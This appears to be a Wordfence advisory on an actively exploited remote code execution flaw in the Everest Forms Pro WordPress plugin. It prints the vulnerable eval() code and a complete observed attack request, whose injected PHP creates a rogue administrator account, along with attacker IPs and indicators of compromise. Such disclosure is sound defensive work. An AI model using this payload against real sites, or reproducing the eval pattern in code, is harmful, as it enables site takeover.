On March 30th, 2026, we publicly disclosed a critical Remote Code Execution vulnerability in Everest Forms Pro , a WordPress plugin with an estimated 4,000 active installations. This vulnerability can be leveraged by unauthenticated attackers to execute arbitrary PHP code on the server, leading to complete site compromise. The vendor released the fully patched version on March 18th, 2026. Our records indicate that attackers started exploiting the issue on April 13th, 2026. The Wordfence Firewall has already blocked over 29,300 exploit attempts targeting this vulnerability. Wordfence Premium , Wordfence Care , and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on February 27, 2026. Sites using the free version of Wordfence received the same protection 30 days later on March 29, 2026. Considering this vulnerability is being actively exploited, we urge users to ensure their sites are updated with the latest patched version of Everest Forms Pro, version 1.9.13 at the time of this writing, as soon as possible. Vulnerability Summary from Wordfence Intelligence Everest Forms Pro <= 1.9.12 - Unauthenticated Remote Code Execution via Calculation Field 9.8 CVSS Rating 9.8 (Critical) CVE-ID CVE-2026-3300 Affected Version(s) <= 1.9.12 Patched Version 1.9.13 Bounty $325.00 Affected Software Everest Forms Pro [everest-forms-pro] Researcher h0xilo The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature. More Details > Vulnerability Details Examining the code reveals that the plugin uses the process_filter() function in the EverestForms\Pro\Addons\Calculation\Process\Process class to evaluate user-defined calculation formulas. The function concatenates submitted form field values into a PHP code string, which is then passed to the eval() function, with the following code snippet: // Calculate Complex calculation. if ( isset( $field['php_code'] ) && isset( $field['js_code'] ) && ! empty( $field['php_code'] ) && ! empty( $field['js_code'] ) ) { $php_code = $field['php_code']; $field_variable = array(); foreach ( $form_data['form_fields'] as $field_id => $form_field_data ) { $field_id_arr = explode( '-', $field_id ); $var_name = '$FIELD_' . $field_id_arr[1]; $field_type = $form_field_data['type']; $field_value = ! empty( $entry['form_fields'][ $field_id ] ) ? $entry['form_fields'][ $field_id ] : 0; $excludeField = array( 'credit-card', 'square-payment', 'authorize-net', 'textarea', 'privacy-policy', 'signature', 'address', 'phone', 'date-time', 'wysiwyg', 'color', 'country', 'yes-no', 'likert', 'yes-no', 'image-upload', 'file-upload', 'scale-rating', ); if ( in_array( $field_type, $excludeField ) ) { continue; } if ( ! is_array( $field_value ) ) { $field_value = trim( preg_replace( '/\$/', '', $field_value ) ); switch ( $field_type ) { case 'text': case 'select': case 'url': case 'email': case 'first-name': case 'last-name': case 'name': case 'radio': if ( is_numeric( $field_value ) ) { $field_variable[] = "$var_name = $field_value"; } else { $field_variable[] = "$var_name = '$field_value'"; } break; case 'payment-multiple': $field_value = ! empty( $form_field_data['choices'][ $field_value ]['value'] ) ? $form_field_data['choices'][ $field_value ]['value'] : 0; if ( is_numeric( $field_value ) ) { $field_variable[] = "$var_name = $field_value"; } else { $field_variable[] = "$var_name = '$field_value'"; } break; default: if ( is_numeric( $field_value ) ) { $field_variable[] = "$var_name = $field_value"; } else { $field_variable[] = "$var_name = '$field_value'"; } break; } } else { switch ( $field_type ) { case 'payment-checkbox': $field_value = ! empty( $form_fields[ $field_id ]['value']['amount'] ) ? $form_fields[ $field_id ]['value']['amount'] : 0; if ( is_numeric( $field_value ) ) { $field_variable[] = "$var_name = $field_value"; } else { $field_variable[] = "$var_name = '$field_value'"; } break; default: break; } } } $final_field_variables = implode( ";\n", $field_variable ); $return_var = Transpiler::RESULT_VAR_NAME; ${Transpiler::FUNCTIONS_ARRAY_NAME} = $this->functions; ${Transpiler::INNER_FUNCTIONS_ARRAY_NAME} = $this->inner_functions; $php_code = preg_replace( '/\<\?php/', "$final_field_variables; $" . '_RETURN = 0;', $php_code . 'return $' . $return_var . ';' ); try { $total = eval( $php_code ); Although user input is sanitized with sanitize_text_field() , this function does not escape single quotes or other characters that are significant in PHP code. For string-based fields (such as text, email, select, and radio fields), the submitted value is placed inside single quotes and directly added to a PHP code string. An unauthenticated attacker can exploit this by submitting a value containing a single quote, followed by malicious PHP code and a comment character, allowing them to break out of the string and inject PHP code that is later executed through the eval() function. This makes it possible for unauthenticated attackers to execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field, as long as the targeted form uses the “Complex Calculation” feature. As with all remote code execution vulnerabilities, this can lead to complete site compromise through the creation of administrator accounts, the use of webshells, and other techniques. A Closer Look at the Attack Data The following data highlights actual exploit attempts from threat actors targeting this vulnerability. Example attack request The most common payload observed in our blocked requests attempts to create a new administrator account named “diksimarina” on the affected site. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: [redacted] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded everest_forms[id]=2909&everest_forms[form_fields][svbtwqPN9R-2]=';if(!username_exists('diksimarina')){wp_insert_user(array('user_login'=>'diksimarina','user_pass'=>'[redacted]','user_email'=>'diksimarina@gmail.com','role'=>'administrator'));echo 'ADMINCREATED';}else{echo 'ADMINEXISTS';} //&everest_forms[form_fields][eluWudCcdM-1]=test&everest_forms[form_fields][email]=test&everest_forms[form_fields][rVuWSql19Q-3]=test&everest_forms[form_fields][rwkAbDLqrq-7]=test&everest_forms[form_fields][LKLn7arQDU-5]=test&action=everest_forms_ajax_form_submission&security=cd840335ff In the request above, the attacker submits a value for a text field that begins with a single quote to close the wrapping string literal, followed by a PHP statement that calls wp_insert_user() to create a new administrator account with the username “diksimarina”. The trailing // comment marker ensures the rest of the generated PHP code, including the closing quote, is treated as a comment and does not cause a syntax error. When the form is processed and the calculation is evaluated, the injected PHP code is executed and the malicious administrator account is created. Once authenticated as the new administrator, the attacker can fully compromise the site by uploading webshells, modifying themes or plugins, or installing further backdoors for persistent access. Wordfence Firewall The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability. Total Number of Exploits Blocked The Wordfence Firewall has blocked over 29,300 exploit attempts since the vulnerability was publicly disclosed. According to our data, attackers started targeting websites on April 13th, 2026. We also detected and blocked a large number of exploit attempts on May 16th, 2026, when over 17,900 exploit attempts were blocked in a single day. Top Offending IP Addresses The following IP Addresses are currently the most actively engaged IP addresses targeting the Everest Forms Pro Complex Calculation feature: 202.56.2.126 Over 26,300 blocked requests. 209.146.60.26 Over 2,600 blocked requests. 15.235.166.18 Over 250 blocked requests. 2402:1f00:8000:800::40db Over 80 blocked requests. 185.78.165.153 Over 10 blocked requests. Indicators of Compromise The attackers are attempting to create new administrator accounts on affected sites. It is recommended to review the list of WordPress users on your site. In particular, look for an administrator account with the username “diksimarina” or the email address “diksimarina@gmail.com”, which has been the most commonly observed payload in attacks targeting this vulnerability. We also recommend reviewing log files for any requests originating from the following IP addresses: 202.56.2.126 209.146.60.26 15.235.166.18 2402:1f00:8000:800::40db 185.78.165.153 Conclusion In today’s article, we covered the attack data for a critical-severity Remote Code Execution vulnerability in the Everest Forms Pro plugin that allows unauthenticated threat actors to execute arbitrary PHP code and achieve complete site compromise. Our threat intelligence indicates that attackers started actively targeting this vulnerability on April 13th, 2026, with mass exploitation occurring on May 16th, 2026. The Wordfence firewall has already blocked over 29,300 exploit attempts targeting this vulnerability. Wordfence Premium , Wordfence Care , and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on February 27, 2026. Sites using the free version of Wordfence received the same protection 30 days later on March 29, 2026. Even if you have already received a firewall rule for this issue we urge you to ensure that your site is updated to the latest version 1.9.13 in order to maintain normal functionality. If you have friends or colleagues using Everest Forms Pro , be sure to forward this advisory to them, as sites could still be unprotected and unpatched. If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care . If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance. The post Attackers Actively Exploiting Critical Vulnerability in Everest Forms Pro Plugin appeared first on Wordfence .